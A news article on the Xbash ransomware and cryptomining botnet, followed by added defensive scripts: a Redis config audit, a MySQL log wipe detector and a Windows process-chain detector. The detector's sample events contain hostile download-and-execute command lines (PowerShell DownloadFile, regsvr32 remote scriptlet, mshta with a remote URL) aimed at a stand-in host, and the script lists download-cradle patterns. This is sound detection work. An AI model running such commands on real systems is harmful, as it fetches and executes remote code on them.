Researchers have discovered a new, sophisticated malware family in the wild that wreaks havoc on Windows and Linux systems with a combination of data-destroying ransomware and malicious cryptomining.

The malware, dubbed Xbash by the Palo Alto Networks Unit 42 researchers who discovered it, targets weak passwords and unpatched vulnerabilities to infect systems. Xbash also shares striking similarities with worms such as WannaCry and Petya/NotPetya, including self-propagation and the ability to spread rapidly.

“Xbash aimed at discovering unprotected services, deleting victims’ MySQL, PostgreSQL and MongoDB databases, and ransom for Bitcoins,” the researchers said in a Monday post. “Xbash uses three known vulnerabilities in Hadoop, Redis and ActiveMQ for self-propagation or infecting Windows systems.”

Xbash has an array of features that make it stand out: it specifically targets both Windows and Linux, it is written in Python, it fetches IP addresses and domain names from its C2 servers as targets to exploit, and it has intranet scanning functionality.

Researchers have discovered four different versions of Xbash so far. All share a set of capabilities, including quick development (using Python), easy installation, anti-detection features and cross-platform support. Despite this level of sophistication, researchers said that code and timestamp differences among the four versions show that the malware is still under active development.

The botnet has been operating since at least May 2018. So far, researchers said they have observed 48 incoming transactions to the Bitcoin wallet addresses used by the malware (totaling about $6,000), possibly indicating 48 victims who paid the ransom.

Attack Vector

The malware exploits three known vulnerabilities: a Hadoop YARN ResourceManager unauthenticated command execution flaw (disclosed in 2016, no CVE assigned), a Redis arbitrary file write and remote command execution flaw (disclosed in 2015, no CVE assigned), and an ActiveMQ arbitrary file write vulnerability (CVE-2016-3088).
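The article names the Redis weakness but does not describe it. As an added example (my own check, not code from the article or from Unit 42), the script below audits a redis.conf for the exposure that internet-wide scanners like Xbash look for. The background is my description rather than the article's: the 2015 Redis technique abuses an instance that accepts unauthenticated connections and honours CONFIG SET dir / CONFIG SET dbfilename followed by SAVE, so an attacker can write an RDB dump to a path of their choosing. The directives checked are standard redis.conf settings; both sample configs are constructed.

```python
"""Audit a redis.conf for unauthenticated network exposure.

Added example, not code from the article or from Unit 42.  The sample
configurations are constructed; the directives are standard redis.conf
settings.
"""
from collections import defaultdict

# Constructed sample: the kind of instance a scanner finds and abuses.
WEAK_CONF = """\
# redis.conf (constructed, weak)
bind 0.0.0.0
port 6379
protected-mode no
# requirepass replace-me
"""

# Constructed sample: the same instance hardened.
HARDENED_CONF = """\
# redis.conf (constructed, hardened)
bind 127.0.0.1
port 6379
protected-mode yes
requirepass REPLACE_WITH_A_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
"""

WILDCARD_BINDS = {"0.0.0.0", "*", "::", "::*"}
# Commands the file-write chain (CONFIG SET ... / SAVE) and a wipe rely on.
DANGEROUS_COMMANDS = ("CONFIG", "FLUSHALL")


def parse_redis_conf(text):
    """Return {directive: [value, ...]}, ignoring blank and commented lines.

    Values are kept in file order because for most directives the last
    occurrence wins in Redis.
    """
    conf = defaultdict(list)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf[parts[0].lower()].append(parts[1].strip() if len(parts) > 1 else "")
    return conf


def audit_redis_conf(text):
    """Return a list of human-readable findings; an empty list means clean."""
    conf = parse_redis_conf(text)
    findings = []

    # No bind directive at all means Redis listens on every interface.
    bind_tokens = [t.lstrip("-") for v in conf.get("bind", []) for t in v.split()]
    if not bind_tokens or any(t in WILDCARD_BINDS for t in bind_tokens):
        findings.append("reachable on all interfaces (no bind, or wildcard bind)")

    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode disabled")

    if not conf.get("requirepass") or not conf["requirepass"][-1]:
        findings.append("no requirepass: unauthenticated clients are accepted")

    renamed = {v.split(None, 1)[0].upper() for v in conf.get("rename-command", []) if v}
    for cmd in DANGEROUS_COMMANDS:
        if cmd not in renamed:
            findings.append(f"{cmd} still reachable under its default name")

    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text) or ["no findings"])
```

Run it against a real redis.conf to get the findings list; an empty list for the hardened sample and five findings for the weak one. Note that `rename-command` is the older control; on Redis 6 and later the ACL system is the preferred way to take CONFIG away from application users, so a config that sets `requirepass` and binds to localhost but uses ACLs instead of renames would still show two findings here and need a manual look.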

Xbash has separate code paths for Windows and Linux targets: the malware determines the operating system of a targeted system and delivers a payload designed for that OS.

On Windows, Xbash focuses on cryptomining and self-propagation, while on Linux it shows its data-destructive side: on Windows the malware triggers a downloader that executes a coinminer, whereas on Linux it runs its ransomware routine.

On Linux, Xbash first attempts to log in to a service, generally MySQL, MongoDB or PostgreSQL, by guessing weak passwords. Once logged in, it deletes almost all existing databases on the server and creates a new database named “PLEASE_READ_ME_XYZ.” It then inserts a ransom message into a table labeled “WARNING” in the new database.

The ransom message asks for 0.02 BTC, or around $125 at the time, as payment to release the compromised databases.
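The two artefacts described above (a burst of DROP DATABASE statements from one connection, then a database named PLEASE_READ_ME_XYZ with a WARNING table) are easy to spot in a MySQL general query log. The detector below is an added example, not code from the article or from Unit 42; the log lines are constructed, and the drop threshold is my assumption. The real general log is tab separated, which the regex tolerates.

```python
"""Flag an Xbash-style database wipe in a MySQL general query log.

Added example, not code from the article or from Unit 42.  Looks for the
two artefacts the article describes on Linux: many DROP DATABASE statements
from a single connection, and any statement touching the ransom database
PLEASE_READ_ME_XYZ.  The sample log is constructed.
"""
import re
from collections import defaultdict

IOC_DATABASE = "PLEASE_READ_ME_XYZ"   # ransom database name from the article
DROP_THRESHOLD = 2                    # assumption: tune to your legitimate jobs

# Constructed sample: one hostile session (thread 12) and one benign one (13).
SAMPLE_GENERAL_LOG = """\
2018-09-17T10:01:02.100000Z    12 Connect   root@203.0.113.5 on  using TCP/IP
2018-09-17T10:01:02.200000Z    13 Connect   app@10.0.0.7 on shop using TCP/IP
2018-09-17T10:01:02.300000Z    12 Query     SHOW DATABASES
2018-09-17T10:01:02.400000Z    13 Query     SELECT id, total FROM orders WHERE id = 42
2018-09-17T10:01:02.500000Z    12 Query     DROP DATABASE `shop`
2018-09-17T10:01:02.600000Z    12 Query     DROP DATABASE `crm`
2018-09-17T10:01:02.700000Z    12 Query     CREATE DATABASE PLEASE_READ_ME_XYZ
2018-09-17T10:01:02.800000Z    12 Query     CREATE TABLE PLEASE_READ_ME_XYZ.WARNING (id INT, warning TEXT)
2018-09-17T10:01:02.900000Z    12 Query     INSERT INTO PLEASE_READ_ME_XYZ.WARNING VALUES (1, 'constructed ransom text: send 0.02 BTC ...')
2018-09-17T10:01:03.000000Z    12 Quit
2018-09-17T10:01:03.100000Z    13 Query     SELECT 1
"""

# time, thread id, command, argument (argument is empty for Quit).
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")
DROP_RE = re.compile(r"^\s*DROP\s+(DATABASE|SCHEMA)\b", re.I)


def analyze_general_log(lines, drop_threshold=DROP_THRESHOLD):
    """Return one alert per connection that wiped databases or touched the IoC db."""
    sessions = defaultdict(lambda: {"client": None, "drops": [], "ioc": []})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        s = sessions[m["tid"]]
        cmd, arg = m["cmd"], m["arg"].strip()
        if cmd == "Connect":
            # "user@host on <db> using TCP/IP": keep the user@host part.
            s["client"] = arg.split(" on", 1)[0]
        elif cmd == "Query":
            if DROP_RE.match(arg):
                s["drops"].append(arg)
            if IOC_DATABASE in arg.upper():
                s["ioc"].append(arg)

    alerts = []
    for tid, s in sessions.items():
        reasons = []
        if len(s["drops"]) >= drop_threshold:
            reasons.append(f"{len(s['drops'])} DROP DATABASE statements in one connection")
        if s["ioc"]:
            reasons.append(f"{len(s['ioc'])} statements referencing {IOC_DATABASE}")
        if reasons:
            alerts.append({"thread": tid, "client": s["client"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyze_general_log(SAMPLE_GENERAL_LOG.splitlines()):
        print(alert)
```

The general log is off by default and costly on a busy server, so in practice the same logic runs over the audit plugin output or over binary-log DDL events; on PostgreSQL the equivalent source is `log_statement = 'ddl'`, and on MongoDB the audit log or profiler. The drop count catches the wipe even if a future version renames the ransom database; the name match catches the ransom note even on a server with only one database.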

On Windows, the malware executes a JavaScript or VBScript downloader, which in turn fetches and runs a coinminer on the system: “Depending on Xbash’s version, this new startup item will download a malicious HTML or a Scriptlet file from Xbash’s C2 server, and execute the JavaScript or VBScript code in the file via “mshta” or via “regsvr32”. These scripts will then invoke PowerShell to download a malicious PE executable or PE DLL file,” researchers said.
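The chain quoted above (mshta.exe or regsvr32.exe pulling a remote HTML or scriptlet file, then spawning PowerShell to download a PE) is visible in process-creation telemetry. The detector below is an added example, not code from the article or from Unit 42: the events are constructed in the shape of a process-creation log with Sysmon-style field names (my assumption), and the indicator patterns are mine, not a Unit 42 list.

```python
"""Detect the mshta/regsvr32 -> PowerShell downloader chain in process events.

Added example, not code from the article or from Unit 42.  Event records are
constructed; field names follow a Sysmon event 1 style layout (assumption).
"""
import ntpath
import re

SCRIPT_HOSTS = {"mshta.exe", "regsvr32.exe"}     # the two hosts the article names
URL_RE = re.compile(r"https?://", re.I)
# Common PowerShell download cradles (my list; extend to taste).
CRADLE_RE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I
)

# Constructed events: explorer launches mshta with a remote HTA, mshta spawns a
# PowerShell downloader, regsvr32 loads a remote scriptlet, plus one benign
# PowerShell run by an admin for contrast.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3980,
     "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe http://203.0.113.10/loader.hta"},
    {"pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://203.0.113.10/m.exe','C:\\Users\\Public\\m.exe')\""},
    {"pid": 4310, "ppid": 3980,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll"},
    {"pid": 5002, "ppid": 3980,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -ExecutionPolicy RemoteSigned -File C:\\Scripts\\inventory.ps1"},
]


def classify_event(ev):
    """Return the reasons a single event is suspicious (empty list if none)."""
    image = ntpath.basename(ev["image"]).lower()      # ntpath: Windows paths on any host
    parent = ntpath.basename(ev["parent_image"]).lower()
    cmd = ev["cmdline"]
    reasons = []
    if image in SCRIPT_HOSTS and URL_RE.search(cmd):
        reasons.append(f"{image} launched with a remote URL")
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        reasons.append(f"powershell.exe spawned by {parent}")
    if image == "powershell.exe" and CRADLE_RE.search(cmd):
        reasons.append("download cradle in PowerShell command line")
    return reasons


def detect_script_host_chains(events):
    """Run classify_event over a batch and return one alert per suspicious event."""
    alerts = []
    for ev in events:
        reasons = classify_event(ev)
        if reasons:
            alerts.append({"pid": ev["pid"], "ppid": ev["ppid"], "reasons": reasons})
    return alerts


def link_chains(alerts):
    """Join alerts whose ppid is another alert's pid into one chain per root."""
    by_pid = {a["pid"]: a for a in alerts}
    chains = []
    for a in alerts:
        if a["ppid"] in by_pid:
            continue                     # not a root; reached from its parent below
        chain, frontier = [a], [a["pid"]]
        while frontier:
            parent_pid = frontier.pop()
            for b in alerts:
                if b["ppid"] == parent_pid:
                    chain.append(b)
                    frontier.append(b["pid"])
        chains.append(chain)
    return chains


if __name__ == "__main__":
    for chain in link_chains(detect_script_host_chains(SAMPLE_EVENTS)):
        print(" -> ".join(f"pid {a['pid']}: {'; '.join(a['reasons'])}" for a in chain))
```

The per-event checks fire on the regsvr32 /i:http scriptlet load and on mshta with a URL even when the PowerShell stage never runs; the parent-child check catches the second stage regardless of how the command line was obfuscated. Linking by ppid turns the three hits into two incidents (one mshta chain, one regsvr32 load) so an analyst sees the delivery as a story rather than as separate alerts.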

However, Unit 42 researchers said they found no evidence of code in Xbash that backs up the deleted databases at all, meaning the malware poses as ransomware but the databases remain destroyed even after the ransom has been paid.

Analysis shows that the malware is likely linked to the Iron Group, a group publicly tied to other ransomware campaigns, including those that use the Remote Control System (RCS), whose source code was believed to have been stolen from Hacking Team in 2015.

Researchers made the connection after discovering that Xbash hard-codes a number of domain names as its C2 servers, some of which were reused from previous Windows coinminers attributed to the Iron cybercrime group.

“After further investigation we realized it’s a combination of botnet and ransomware developed by an active cybercrime group, Iron (aka Rocke), this year,” the researchers said.